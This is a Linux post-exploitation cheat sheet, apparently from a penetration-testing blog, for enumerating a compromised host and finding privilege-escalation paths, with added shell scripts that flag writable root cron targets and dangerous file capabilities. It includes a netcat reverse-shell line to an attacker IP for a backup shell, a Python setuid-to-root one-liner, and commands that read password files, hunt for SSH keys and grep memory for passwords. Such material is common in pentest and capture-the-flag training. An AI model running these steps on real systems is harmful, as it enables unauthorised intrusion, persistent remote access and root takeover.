If your console is narrow, widen it right at the start (this needs a proper pty; in a raw socket shell stty fails with "Inappropriate ioctl for device"):
stty rows 50 cols 200
Consider spawning a second reverse shell right away, as a backup in case the first one dies:
nc -e /bin/sh $attackerip 4444 &
Basic enumeration of the host
id
groups
cat /etc/passwd
cat /etc/group
cat /etc/hosts
cat /etc/fstab
uname -a // Check for kernel exploits matching this kernel version.
// ALSO search for exploits by distribution name and release!
// If uname is unavailable: cat /proc/version
sudo -l // What may this user run via sudo, and without a password? See the blog post for details.
su // try the same password, if known (password reuse is common)
cat /etc/fstab; lsblk; mount // if there is an unmounted device or share, mount it and look inside.
Check cron:
cat /etc/crontab
cd /etc/cron.d...
grep "CRON" /var/log/syslog
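The cron files are worth more than a glance: a job that runs as root but executes a script the current user can write to (or a script that no longer exists in a directory the user can write to) is a direct path to root. The following is an added example, not part of the original post, that pulls the "user / command" pairs out of a system-style crontab and flags such targets. The crontab content and temporary tree it runs on are constructed for the demo; on a real host point writable_cron_targets at /etc/crontab and each file in /etc/cron.d.

```sh
#!/bin/sh
# Added example: flag cron jobs whose program file we can write to.

# Print "user<TAB>command" for every job in a system-style crontab
# (five schedule fields or an @keyword, then the user, then the command).
# Comments, blank lines and VAR=value assignments are skipped.
cron_jobs() {
    grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$1" |
    awk '{
        # @reboot/@daily lines have one schedule field, the rest have five
        start = ($1 ~ /^@/) ? 3 : 7
        cmd = ""
        for (i = start; i <= NF; i++) cmd = cmd (i > start ? " " : "") $i
        print $(start - 1) "\t" cmd
    }'
}

# Take the first word of each command as the program path. Report it if we
# can write to it, or if it is missing but its directory is writable (then
# we can simply create it). Only absolute paths are checked; "cd /x && ..."
# style commands are skipped.
writable_cron_targets() {
    cron_jobs "$1" | while IFS="$(printf '\t')" read -r user cmd; do
        prog=${cmd%% *}
        case "$prog" in /*) ;; *) continue ;; esac
        if [ -w "$prog" ]; then
            printf '%s\t%s\tWRITABLE\n' "$user" "$prog"
        elif [ ! -e "$prog" ] && [ -w "$(dirname "$prog")" ]; then
            printf '%s\t%s\tMISSING-DIR-WRITABLE\n' "$user" "$prog"
        fi
    done
}

# Demo on a constructed crontab: one writable script, one missing script in
# a writable directory, and two jobs we cannot influence.
demo_writable_cron_targets() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/scripts"
    printf '#!/bin/sh\necho backup\n' > "$tmp/scripts/backup.sh"
    chmod 755 "$tmp/scripts/backup.sh"        # owned by us, hence writable
    cat > "$tmp/crontab" <<EOF
# constructed /etc/crontab for the demo
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    $tmp/scripts/backup.sh --quiet
@reboot         root    $tmp/scripts/missing.sh
0 2     * * *   www-data /nonexistent-dir-for-demo/cron.php
EOF
    writable_cron_targets "$tmp/crontab"
    rm -rf "$tmp"
}

demo_writable_cron_targets
```

The last job stands in for a root-owned target we cannot touch (a path that does not exist on the demo machine), so only the backup.sh and missing.sh jobs are reported. On a real host run the check as the unprivileged user you actually are: `[ -w ]` answers for the current uid, so running it as root flags everything.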
Look into the home and some other directories:
cd /home && find ...
cd /root
cd /etc/profile.d
cd /opt
See what’s installed:
ps aux // Note all processes that run as root (mysql, backup scripts, ...)
systemctl // lists all units, active and inactive!
systemctl status // hierarchical view of all active units and their processes.
dpkg -l // list installed packages (Debian-based); use the equivalent for other distros
Browse through the logs
- On older systems, browse the files in /var/log:
cd /var/log
- On systems with systemd, see everything with:
journalctl
Check for files owned by interesting users (and groups); /proc is excluded to cut noise:
for user in u1 u2; do find / -user "$user" 2>/dev/null | grep -v ^/proc; find / -group "$user" 2>/dev/null | grep -v ^/proc; done
If there is only the current user, $user is not set; use your own user and group name instead:
find / -user "$(id -un)" 2>/dev/null | grep -v ^/proc; find / -group "$(id -gn)" 2>/dev/null | grep -v ^/proc;
More things to do:
- Search for SSH key files
- Investigate user cron files (See here for a list of all possible cron files.)
- Investigate web server configuration files
- Investigate email directories.
- Search for SUID and SGID files. The leading minus in -perm means "all of these bits are set" (mask mode). The two tests must be grouped: without the parentheses -print binds only to the second -perm and SGID files are never printed.
find / \( -perm -2000 -o -perm -4000 \) -print 2>/dev/null
- Search for world-readable files (use -o+w instead for world-writable ones):
find . -perm -o+r
- Search for directories you can write into:
find / -writable -type d 2>/dev/null
- Search for files modified within a time window:
find / -newermt 2020-01-02 ! -newermt 2020-02-01 2> /dev/null
- Scan the memory for passwords. Needs root, and most distribution kernels restrict /dev/mem (CONFIG_STRICT_DEVMEM), so expect this to return little or nothing:
strings -n10 /dev/mem | grep -i PASS
Network enumeration
Show network configuration
ifconfig
ip a
ss -natup
netstat -tulpen
List listening ports. Note them in your list and enumerate them (maybe via port forwarding); services bound to 127.0.0.1 were invisible from the outside and are often less hardened.
netstat -natup // -p shows the owning process only for your own sockets; use sudo, if you can, to see it for all of them.
netstat -ano // alternative view: all sockets, numeric addresses, with timers
Have a look at the packet filter rules, e.g. the saved rule set:
cat /etc/iptables/rules.v4
List known neighbour systems (ARP cache), i.e. hosts this machine has talked to recently:
ip neigh
arp -en
Various less likely things to try
Check for unusual file capabilities (see the Linux security fundamentals post if you find something). For example, if an interpreter like Python has cap_setuid+ep set, it can switch its uid to 0 although it runs in an unprivileged process: python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
getcap // try this first: if the binary is missing, the recursive command below silently prints nothing, since its errors go to /dev/null :) Sometimes it lives in /usr/sbin/getcap
getcap -r / 2>/dev/null
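A recursive getcap run on a real host returns a handful of expected entries (ping with cap_net_raw, tcpdump, gnome-keyring-daemon) among which the one interesting line is easy to miss. The following is an added example, not from the original post, that filters getcap output for capabilities that lead directly to root or to reading arbitrary files. The sample output is constructed and covers both output styles libcap has used (`path = caps+ep` and `path caps=ep`); the list of "dangerous" capabilities is my selection, not something the post defines.

```sh
#!/bin/sh
# Added example: pick out file capabilities worth escalating through.

# Constructed getcap -r / output, mixing old and new libcap formatting.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/usr/bin/perl cap_dac_read_search=ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep'

# Reads getcap output on stdin and prints "path<TAB>dangerous caps" for each
# line that carries at least one capability from the list below.
# cap_setuid/cap_setgid let a process become root; cap_dac_override and
# cap_dac_read_search bypass file permissions; the rest give kernel- or
# filesystem-level control that is equivalent to root in practice.
# Paths containing spaces are not handled (the path is taken as field 1).
flag_dangerous_caps() {
    awk -v danger='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_chown cap_fowner cap_setfcap cap_sys_rawio' '
    BEGIN { n = split(danger, d, " "); for (i = 1; i <= n; i++) bad[d[i]] = 1 }
    {
        path = $1
        spec = $NF                     # "cap_a,cap_b+ep" or "cap_a,cap_b=ep"
        sub(/[+=].*$/, "", spec)       # drop the flag letters, keep the names
        m = split(spec, caps, ",")
        hits = ""
        for (i = 1; i <= m; i++)
            if (caps[i] in bad) hits = hits (hits != "" ? "," : "") caps[i]
        if (hits != "") print path "\t" hits
    }'
}

# Run the filter over the constructed sample.
demo_flag_dangerous_caps() {
    printf '%s\n' "$SAMPLE_GETCAP" | flag_dangerous_caps
}

demo_flag_dangerous_caps
```

Usage on a live host: `getcap -r / 2>/dev/null | flag_dangerous_caps`. In the sample only python3.8 (cap_setuid) and perl (cap_dac_read_search, which reads /etc/shadow or root's SSH keys) are flagged; the network and ipc_lock entries are normal and stay out of the way.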
Check whether AppArmor is installed and which profiles are enforced (your payload may be confined):
aa-status
More things:
debsums | grep -v OK // packaged files whose checksum no longer matches: modified binaries or configs (Debian-based only)
tmux ls // detached tmux sessions of this user, possibly with privileged shells inside
screen -list // same for screen